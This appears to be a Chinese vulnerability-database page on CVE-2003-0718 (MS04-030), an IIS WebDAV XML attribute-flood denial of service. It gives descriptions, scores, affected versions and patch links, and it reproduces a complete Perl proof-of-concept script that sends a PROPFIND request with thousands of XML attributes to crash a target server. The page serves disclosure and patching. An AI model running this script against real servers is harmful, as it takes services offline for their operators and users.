CVE-2003-0718
CVSS5.0
发布时间 :2004-11-03 00:00:00
修订时间 :2016-10-17 22:36:51
NMCOEPS    

[原文]The WebDAV Message Handler for Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows remote attackers to cause a denial of service (memory and CPU exhaustion, application crash) via a PROPFIND request with an XML message containing XML elements with a large number of attributes.


[CNNVD]Microsoft Windows WebDAV XML消息处理远程拒绝服务漏洞(MS04-030)(CNNVD-200411-017)

        
        Microsoft IIS默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。
        Microsoft IIS包含的WEBDAV组件对特殊构建的WEBDAV请求处理不正确,远程攻击者可以利用这个漏洞利用WEBDAV消耗大量内存和CPU时间,导致拒绝服务攻击。
        攻击者可以构建恶意的使用XML属性的WEBDAV PROPFIND请求,可导致XML解析器消耗大量内存和CPU时间,造成拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:5.1Microsoft IIS 5.1
cpe:/a:microsoft:internet_information_server:6.0Microsoft IIS 6.0
cpe:/a:microsoft:internet_information_server:5.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:4767Windows Server 2003 IIS WebDAV Message Handler Denial of Service Vulnerability
oval:org.mitre.oval:def:1427Windows XP IIS WebDAV Message Handler Denial of Service Vulnerability
oval:org.mitre.oval:def:1330Windows 2000 IIS WebDAV Message Handler Denial of Service Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0718
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0718
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-017
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109762641822064&w=2
(UNKNOWN)  BUGTRAQ  20041012 Microsoft IIS 5.x/6.0 WebDAV (XML parser) attribute blowup DoS
http://www.microsoft.com/technet/security/bulletin/ms04-030.asp
(VENDOR_ADVISORY)  MS  MS04-030
http://xforce.iss.net/xforce/xfdb/17645
(VENDOR_ADVISORY)  XF  iis-webdav-xml-attribute-dos(17645)
http://xforce.iss.net/xforce/xfdb/17656
(VENDOR_ADVISORY)  XF  iis-ms04030-patch(17656)

- 漏洞信息

Microsoft Windows WebDAV XML消息处理远程拒绝服务漏洞(MS04-030)
中危 其他
2004-11-03 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft IIS默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。
        Microsoft IIS包含的WEBDAV组件对特殊构建的WEBDAV请求处理不正确,远程攻击者可以利用这个漏洞利用WEBDAV消耗大量内存和CPU时间,导致拒绝服务攻击。
        攻击者可以构建恶意的使用XML属性的WEBDAV PROPFIND请求,可导致XML解析器消耗大量内存和CPU时间,造成拒绝服务。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭WEBDAV服务。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-030)以及相应补丁:
        MS04-030:Vulnerability in WebDAV XML Message Handler Could Lead to a Denial of Service (824151)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-030.mspx

        补丁下载:
        Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=D2C632A7-CD43-466C-A624-D841905CE181

        
        Microsoft Windows XP and Microsoft Windows XP Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=6A338C59-3693-4A25-B823-431A5C21A4B7

        
        Microsoft Windows XP 64-Bit Edition Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0412A361-28C5-45F7-9853-BCDC9D7B2B97

        
        Microsoft Windows XP 64-Bit Edition Version 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1F9CA027-B0B8-47DC-BB96-8709E3DB0DF2

        
        Microsoft Windows Server? 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=81CE104D-5257-447C-A2CD-D4D149581D71

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=1F9CA027-B0B8-47DC-BB96-8709E3DB0DF2

- 漏洞信息 (585)

MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) (EDBID:585)
windows dos
2004-10-20 Verified
0 Amit Klein
N/A [点击下载]
#!/usr/bin/perl
# IIS BlowOut 
# POC exploit for MS04-030. Found by Amit Klein. 
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" "; 

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " . 
$xmlatt . 
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: 
$host\nContent-length: $l\n\n$xmldata\n\n"; 

syswrite($socket,$req,length($req));

close $socket;

# milw0rm.com [2004-10-20]
		

- 漏洞信息 (F34685)

ms04-030_spl.pl (PacketStormID:F34685)
2004-10-19 00:00:00
incognito_ergo  
exploit
CVE-2003-0718
[点击下载]

DoS exploit for Microsoft XML parsing flaw. This is an exploit for the issues described in MS04-30.

- 漏洞信息

10688
Microsoft Windows WebDAV XML Message Handler Malformed Request DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Unknown

- 漏洞描述

Windows contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends a specially crafted WebDAV PROPFIND request to a server running WebDAV services. Because the server does not impose a limit on the number of attributes, this may result in loss of availability for the platform.

- 时间线

2004-10-12 Unknow
2004-10-21 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft XML Parser Remote Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 11384
Yes No
2004-10-12 12:00:00 2009-07-12 07:06:00
Discovery is credited to Amit Klein and Sanctum, Inc.

- 受影响的程序版本

Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers
Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12

- 不受影响的程序版本

Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12

- 漏洞讨论

Microsoft XML Parser is prone to a remote denial of service vulnerability when handling malformed requests. The vulnerability can be exploited through the WebDAV XML message handler of Microsoft IIS server.

It is reported that this issue requires a remote attacker to create specially crafted WebDAV requests and send them to a vulnerable server over TCP port 80. There is a possibility of increased CPU resource and memory consumption as the IIS server attempts to process these requests. This can eventually lead to a denial of service condition in the server. A reboot is required to restore normal functionality.

This vulnerability can also be exposed through other applications that rely on Microsoft XML Parser to process XML messages.

- 漏洞利用

A proof of concept that will crash IIS is available, an additional proof of concept 'IIS_WebDAV_XML_DoS.c' is made available by velank &lt;velank@eapglobal.com&gt;:

- 解决方案

Avaya has released an advisory that acknowledges this vulnerability for Avaya products. Customers are advised to follow Microsoft's guidance for applying patches. Please see the referenced Avaya advisory at the following location for further details:
http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=203487&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.


Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows XP 64-bit Edition Version 2003 SP1

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows 2000 Server SP4

Microsoft Windows XP Professional

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站